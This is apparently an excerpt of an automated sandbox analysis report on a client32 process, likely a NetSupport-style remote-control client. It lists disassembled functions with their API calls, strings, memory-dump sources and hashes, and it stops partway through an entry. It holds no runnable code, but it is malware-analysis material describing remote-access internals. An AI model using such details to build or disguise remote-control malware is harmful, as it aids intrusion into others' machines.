                                                                                                                                        Function 1105F4E0 Relevance: 19.6, APIs: 4, Strings: 7, Instructions: 303COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(?,A0A8B03E), ref: 1105F575
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalEnterSection
                                                                                                                                        • String ID: (NULL)$..\ctl32\Config.cpp$Send EV_CONFIGSET from %s@%d$WARNING: *NOT* Sending EV_CONFIGSET from %s@%d$cfg %x: Set [%s]%s=%s$err == 0$idata->hCurrConfig
                                                                                                                                        • API String ID: 1904992153-2291704020
                                                                                                                                        • Opcode ID: 7564576bb57869270d37a83ab78fed3b4010e158bf53d0a53a334a7474803b15
                                                                                                                                        • Instruction ID: 501b761f8d4f66308541786f925d86308bffddf73d4b9490df9615a8adf09b6f
                                                                                                                                        • Opcode Fuzzy Hash: 7564576bb57869270d37a83ab78fed3b4010e158bf53d0a53a334a7474803b15
                                                                                                                                        • Instruction Fuzzy Hash: 08C1C171E0026A9BDB96CF24C880BE9B7F9FB08704F0441DCE959A7241D775AB84CB92
                                                                                                                                        Function 11030438 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 249COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                          • Part of subcall function 11105D40: OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11105E1A
                                                                                                                                          • Part of subcall function 11105D40: CloseHandle.KERNEL32(00000000), ref: 11105E29
                                                                                                                                          • Part of subcall function 11105D40: GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11105E3B
                                                                                                                                          • Part of subcall function 11105D40: LoadLibraryA.KERNEL32(?), ref: 11105E71
                                                                                                                                          • Part of subcall function 11105D40: GetProcAddress.KERNEL32(?,GrabKM), ref: 11105E9E
                                                                                                                                          • Part of subcall function 11105D40: GetProcAddress.KERNEL32(?,LoggedOn), ref: 11105EB6
                                                                                                                                        • GetStockObject.GDI32(0000000D), ref: 11030672
                                                                                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
                                                                                                                                        • InterlockedExchange.KERNEL32(02378DB8,00001388), ref: 11030746
                                                                                                                                        • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778
                                                                                                                                        • _sprintf.LIBCMT ref: 1103078D
                                                                                                                                        • _setlocale.LIBCMT ref: 11030797
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorModeObjectProc$CloseDirectoryEventExchangeHandleInterlockedLibraryLoadOpenStockSystem_memset_setlocale_sprintfwsprintf
                                                                                                                                        • String ID: .%d$Error %s unloading audiocap dll$pcicl32
                                                                                                                                        • API String ID: 3430446287-3899566344
                                                                                                                                        • Opcode ID: f1f28ec3ab837d54fd286a0c8f1f58c599bf04ba19ecf6f4903bac0d6648c01a
                                                                                                                                        • Instruction ID: 7e43821cc75c177b4768292a53131964eea8ecc700feb9324c3a072739083bb6
                                                                                                                                        • Opcode Fuzzy Hash: f1f28ec3ab837d54fd286a0c8f1f58c599bf04ba19ecf6f4903bac0d6648c01a
                                                                                                                                        • Instruction Fuzzy Hash: B291F8B4D06359DEEF02CBF488447ADFEF6AB8430CF1041AAD445A7289FB755A44CB52
                                                                                                                                        Function 11141710 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 175registryCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetVersionExA.KERNEL32(111ECE98,76938400), ref: 11141740
                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
                                                                                                                                        • _memset.LIBCMT ref: 1114179D
                                                                                                                                          • Part of subcall function 1113F670: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,76938400,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690
                                                                                                                                        • _strncpy.LIBCMT ref: 1114186A
                                                                                                                                          • Part of subcall function 111601FD: __isdigit_l.LIBCMT ref: 11160222
                                                                                                                                        • RegCloseKey.KERNEL32(00000000), ref: 11141906
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                                                                        • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                                                                        • API String ID: 3299820421-2117887902
                                                                                                                                        • Opcode ID: b8864b494b3fac32ad8ebd53af7f3ba24bc78c93f4beef13e60cba419166683e
                                                                                                                                        • Instruction ID: 6295e9c0ce894988be5bd3b5eca6cb3bc4700dba655a443855223a39f27a81e3
                                                                                                                                        • Opcode Fuzzy Hash: b8864b494b3fac32ad8ebd53af7f3ba24bc78c93f4beef13e60cba419166683e
                                                                                                                                        • Instruction Fuzzy Hash: A051D975F0022AAFEB21CFA4CC41FEEFBB59B01708F1040A9E519A6181E7707A84CF91
                                                                                                                                        Function 11026810 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 174sleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _strtok.LIBCMT ref: 11026896
                                                                                                                                        • _strtok.LIBCMT ref: 110268D0
                                                                                                                                        • Sleep.KERNEL32(?,?,*max_sessions,0000000A,00000000), ref: 110269C4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _strtok$Sleep
                                                                                                                                        • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                                                                        • API String ID: 2009458258-3774545468
                                                                                                                                        • Opcode ID: 5d0b38da53809c6216564b10fa26affc32737c16451f306886d41c61f9b2a0b7
                                                                                                                                        • Instruction ID: 98283bc1e60aabc3c83d60b427db3e00e80f6799957732ebefc1b0d9f7cef5d9
                                                                                                                                        • Opcode Fuzzy Hash: 5d0b38da53809c6216564b10fa26affc32737c16451f306886d41c61f9b2a0b7
                                                                                                                                        • Instruction Fuzzy Hash: 4051F371F0025E9BDB12CFE5CD80BEEFBE9AB84308F504169DC55A7244EB306945C792
                                                                                                                                        Function 688F8D00 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 144COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,689067B5), ref: 688F8D6B
                                                                                                                                          • Part of subcall function 688F4F70: LoadLibraryA.KERNEL32(psapi.dll,?,688F8DC8), ref: 688F4F78
                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 688F8DCB
                                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 688F8DD8
                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 688F8EBF
                                                                                                                                          • Part of subcall function 688F4FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 688F4FC4
                                                                                                                                          • Part of subcall function 688F4FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,688F8E0D,00000000,?,688F8E0D,00000000,?,00000FA0,?), ref: 688F4FE4
                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 688F8EAE
                                                                                                                                          • Part of subcall function 688F5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 688F5014
                                                                                                                                          • Part of subcall function 688F5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,688F8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 688F5034
                                                                                                                                          • Part of subcall function 688F2420: _strrchr.LIBCMT ref: 688F242E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
                                                                                                                                        • String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
                                                                                                                                        • API String ID: 2714439535-3484705551
                                                                                                                                        • Opcode ID: 38568b548633cf90b6978f13c5a0e498d3a54efa6f18a9434d01a8856703a75a
                                                                                                                                        • Instruction ID: f8fc1d3d8f8b43b5fd271c253014971d4046e0ce3e2ccadb9baa843ef29d2846
                                                                                                                                        • Opcode Fuzzy Hash: 38568b548633cf90b6978f13c5a0e498d3a54efa6f18a9434d01a8856703a75a
                                                                                                                                        • Instruction Fuzzy Hash: 0F410975A44229AFDB30CB56DC45FEE7378EB85748F800874EA15E3540EB709A45CF60
                                                                                                                                        Function 110FFE60 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 68threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 110883C0: UnhookWindowsHookEx.USER32(?), ref: 110883E3
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 110FFE7C
                                                                                                                                        • GetThreadDesktop.USER32(00000000), ref: 110FFE83
                                                                                                                                        • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 110FFE93
                                                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 110FFEA0
                                                                                                                                        • CloseDesktop.USER32(00000000), ref: 110FFEB9
                                                                                                                                        • GetLastError.KERNEL32 ref: 110FFEC1
                                                                                                                                        • CloseDesktop.USER32(00000000), ref: 110FFED7
                                                                                                                                        • GetLastError.KERNEL32 ref: 110FFEDF
                                                                                                                                        Strings
                                                                                                                                        • SetThreadDesktop(%s) ok, xrefs: 110FFEAB
                                                                                                                                        • SetThreadDesktop(%s) failed, e=%d, xrefs: 110FFEC9
                                                                                                                                        • OpenDesktop(%s) failed, e=%d, xrefs: 110FFEE7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                                                                        • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                                                                        • API String ID: 2036220054-60805735
                                                                                                                                        • Opcode ID: 312bc41d0c80e05ecd2e77a132ac577f729ffb3f5c645a3c4c1f69d055c1a107
                                                                                                                                        • Instruction ID: 156f0d79109f07c40c4ac8670e692553d53260d930ebdb42a1d89f925a608cc0
                                                                                                                                        • Opcode Fuzzy Hash: 312bc41d0c80e05ecd2e77a132ac577f729ffb3f5c645a3c4c1f69d055c1a107
                                                                                                                                        • Instruction Fuzzy Hash: 9811947AF0022767D2116FB06C89B6FBA18AF8561DF104038FA1B85581EF24A94483F3
                                                                                                                                        Function 1115AB80 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115ABA8
                                                                                                                                        • GetLastError.KERNEL32 ref: 1115ABB5
                                                                                                                                        • wsprintfA.USER32 ref: 1115ABC8
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                          • Part of subcall function 110290F0: _strrchr.LIBCMT ref: 110291E5
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 11029224
                                                                                                                                        • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115AC0C
                                                                                                                                        • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115AC19
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                                                                        • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                                                                        • API String ID: 1734919802-1728070458
                                                                                                                                        • Opcode ID: 60df89256fdbe4fb07ae3e45b32be970c36e3097d10c8cf2f3f63e8d74a38f38
                                                                                                                                        • Instruction ID: 447bd79fb7e316194c8fbcf3240c79f01d8f25fe8b238cd57140670aacafd43f
                                                                                                                                        • Opcode Fuzzy Hash: 60df89256fdbe4fb07ae3e45b32be970c36e3097d10c8cf2f3f63e8d74a38f38
                                                                                                                                        • Instruction Fuzzy Hash: 7811C475D01319AFC720EFFA9DC09AAF7B8FF01319B40462EE56653540EA7095408B5A
                                                                                                                                        Function 1110D060 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                        • std::exception::exception.LIBCMT ref: 1110D0CA
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 1110D0DF
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 1110D0F6
                                                                                                                                        • InitializeCriticalSection.KERNEL32(-00000010,?,000000FF,?,11026F57,00000001,000003EC), ref: 1110D109
                                                                                                                                        • InitializeCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57,00000001,000003EC), ref: 1110D118
                                                                                                                                        • EnterCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57), ref: 1110D12C
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,?,11026F57), ref: 1110D152
                                                                                                                                        • LeaveCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57), ref: 1110D1DF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
